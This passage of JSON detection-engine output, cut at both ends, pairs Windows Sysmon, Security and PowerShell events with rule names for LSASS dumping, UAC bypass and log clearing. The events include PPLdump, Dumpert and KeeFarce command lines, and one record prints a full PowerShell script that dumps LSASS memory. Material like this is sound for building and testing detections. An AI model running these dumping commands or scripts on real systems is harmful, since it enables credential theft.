22:09:25.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564589,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:25.389633Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Processes Suspicious Parent Directory","LSASS Memory Dumping"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"Services and Controller app","FileVersion":"10.0.17763.1075 
(WinBuild.160101.0800)","Hashes":"SHA1=617A0A0BAAB180541DB739C4A6851D784943C317,MD5=DB896369FB58241ADF28515E3765C514,SHA256=A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC,IMPHASH=7D2820FC8CAF521DC2058168B480D204","Image":"C:\\Windows\\System32\\services.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E19-6082-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"services.exe","ParentCommandLine":"PPLdump.exe -v lsass lsass.dmp","ParentImage":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","ParentProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ParentProcessId":6316,"ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2021-04-22 22:09:26.016"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564593,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:26.081337Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","CreateMiniDump Hacktool"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-04-22 22:09:26.157","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.dmp","UtcTime":"2021-04-22 
22:09:26.157"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":564596,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:26.163007Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E1A-6082-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":624,"ProcessGuid":"747F3D96-F41F-6081-0000-001078834A00","ProcessId":6644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-22 
22:09:35.263"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564605,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:35.284225Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-09-28 12:47:36.624","Image":"C:\\WINDOWS\\system32\\rdrleakdiag.exe","ProcessGuid":"BC47D85C-DB68-5F71-0000-0010B237AB01","ProcessId":3352,"RuleName":"","TargetFilename":"C:\\Users\\wanwan\\Desktop\\minidump_668.dmp","UtcTime":"2020-09-28 12:47:36.624"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-PIU87N6","Correlation":null,"EventID":11,"EventRecordID":5229,"Execution_attributes":{"ProcessID":2848,"ThreadID":2328},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-09-28T12:47:36.630448Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198238040,"Execution_attributes":{"ProcessID":744,"ThreadID":2028},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-25T09:09:14.916619Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":769792,"Execution_attributes":{"ProcessID":264,"ThreadID":7672},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-17T10:57:37.013214Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"CommandLine":"KeeFarce.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40","Image":"C:\\Users\\Public\\KeeFarce.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A19B-5CC4-0000-0020A8FF0000","LogonId":"0xffa8","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-A22D-5CC4-0000-0010E2830900","ParentProcessId":3680,"ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"technique_id=T1036,technique_name=Masquerading","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-27 18:47:00.046"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7020,"Execution_attributes":{"ProcessID":1816,"ThreadID":1228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-27T18:47:00.046849Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747","Image":"C:\\Users\\Public\\KeeFarce.exe","ImageLoaded":"C:\\Users\\Public\\BootstrapDLL.dll","ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"creddump - keefarce HKTL","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-04-27 18:47:00.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7022,"Execution_attributes":{"ProcessID":1816,"ThreadID":1228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-04-27T18:47:00.062474Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Users\\administrator\\Desktop\\x64\\Outflank-Dumpert.exe","ProcessGuid":"ECAD0485-88C9-5D0C-0000-0010348C1D00","ProcessId":3572,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 
07:35:37.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238375,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:37.329185Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:50.258"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238380,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:50.259077Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 
07:35:50.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238383,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:50.729226Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 07:36:50.985","Image":"C:\\Users\\administrator\\Desktop\\AndrewSpecial.exe","ProcessGuid":"ECAD0485-8912-5D0C-0000-0010FD2F1F00","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\Desktop\\Andrew.dmp","UtcTime":"2019-06-21 07:36:50.985"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238387,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:36:51.681567Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Version","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5589,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Name","UtcTime":"2019-03-17 
20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5590,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE4755D1CB0002A410","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Id","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5591,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\MostRecentStart","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5592,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Accessing WinAPI in PowerShell","Malicious PowerShell Keywords","PowerShell Get-Process LSASS in ScriptBlock"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"C:\\Users\\Public\\lsass_wer_ps.ps1","ScriptBlockId":"27f08bda-c330-419f-b83b-eb5c0f699930","ScriptBlockText":"function Memory($path)\r\n{\r\n\t\t\t \r\n\t\t\t \r\n\t\t$Process = Get-Process lsass\r\n\t\t$DumpFilePath = $path\r\n\t\t\r\n\t\t$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')\r\n\t\t$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')\r\n\t\t$Flags = [Reflection.BindingFlags] 'NonPublic, Static'\r\n\t\t$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)\r\n\t\t$MiniDumpWithFullMemory = [UInt32] 2\r\n\t\r\n\t\t\t\r\n\t\t\t #\r\n\t\t$ProcessId = $Process.Id\r\n\t\t$ProcessName = $Process.Name\r\n\t\t$ProcessHandle = $Process.Handle\r\n\t\t$ProcessFileName = \"$($ProcessName).dmp\"\r\n\t\t\r\n\t\t$ProcessDumpPath = Join-Path $DumpFilePath 
$ProcessFileName\r\n\t\t\r\n\t\t$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)\r\n\t\t\t \r\n\t\t$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$ProcessId,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$FileStream.SafeFileHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$MiniDumpWithFullMemory,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero))\r\n\t\t\t \r\n\t\t$FileStream.Close()\r\n\t\t\r\n\t\tif (-not $Result)\r\n\t\t{\r\n\t\t\t$Exception = New-Object ComponentModel.Win32Exception\r\n\t\t\t$ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\"\r\n\t\t\t\r\n\t\t\t# Remove any partially written dump files. For example, a partial dump will be written\r\n\t\t\t# in the case when 32-bit PowerShell tries to dump a 64-bit process.\r\n\t\t\tRemove-Item $ProcessDumpPath -ErrorAction SilentlyContinue\r\n\t\t\t\r\n\t\t\tthrow $ExceptionMessage\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\"Memdump complete!\"\r\n\t\t}\r\n\t\r\n}"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"4AA5EAE3-4F33-0001-3A2B-A64A334FD601"},"EventID":4104,"EventRecordID":971,"Execution_attributes":{"ProcessID":7008,"ThreadID":6488},"Keywords":"0x0","Level":3,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2020-06-30T14:24:08.254605Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - System log was 
cleared"],"event":{"Event":{"System":{"Channel":"System","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":104,"EventRecordID":63220,"Execution_attributes":{"ProcessID":264,"ThreadID":644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security_attributes":{"UserID":"S-1-5-21-308926384-506822093-3341789130-1106"},"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T19:28:31.453647Z"},"Version":0},"UserData":{"LogFileCleared":{"BackupPath":"","Channel":"System","SubjectDomainName":"3B","SubjectUserName":"a-jbrown"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"ppldump.exe -p lsass.exe -o a.png","Company":"?","CurrentDirectory":"c:\\Users\\Public\\BYOV\\ZAM64\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC","Image":"C:\\Users\\Public\\BYOV\\ZAM64\\ppldump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-21D2-5E41-0000-002034770900","LogonId":"0x97734","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-27FE-5E41-0000-0010DD653800","ParentProcessId":4236,"ProcessGuid":"747F3D96-2B98-5E41-0000-00109C904700","ProcessId":5016,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 
10:08:24.525"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":20012,"Execution_attributes":{"ProcessID":2728,"ThreadID":3456},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-02-10T10:08:24.535095Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"chost.exe payload.bin","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\evasion\\","Description":"?","FileVersion":"?","Hashes":"SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25","Image":"C:\\Users\\Public\\tools\\evasion\\chost.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"?","ParentCommandLine":"\"C:\\windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-001025004E3A","ParentProcessId":30572,"ProcessGuid":"00247C92-20BD-5EFE-0000-00106D029D3A","ProcessId":16900,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 
18:00:29.612"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116720,"Execution_attributes":{"ProcessID":5320,"ThreadID":6908},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T18:00:29.615842Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Conhost Parent Process Executions"],"event":{"Event":{"EventData":{"CommandLine":"notepad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Notepad","FileVersion":"10.0.18362.693 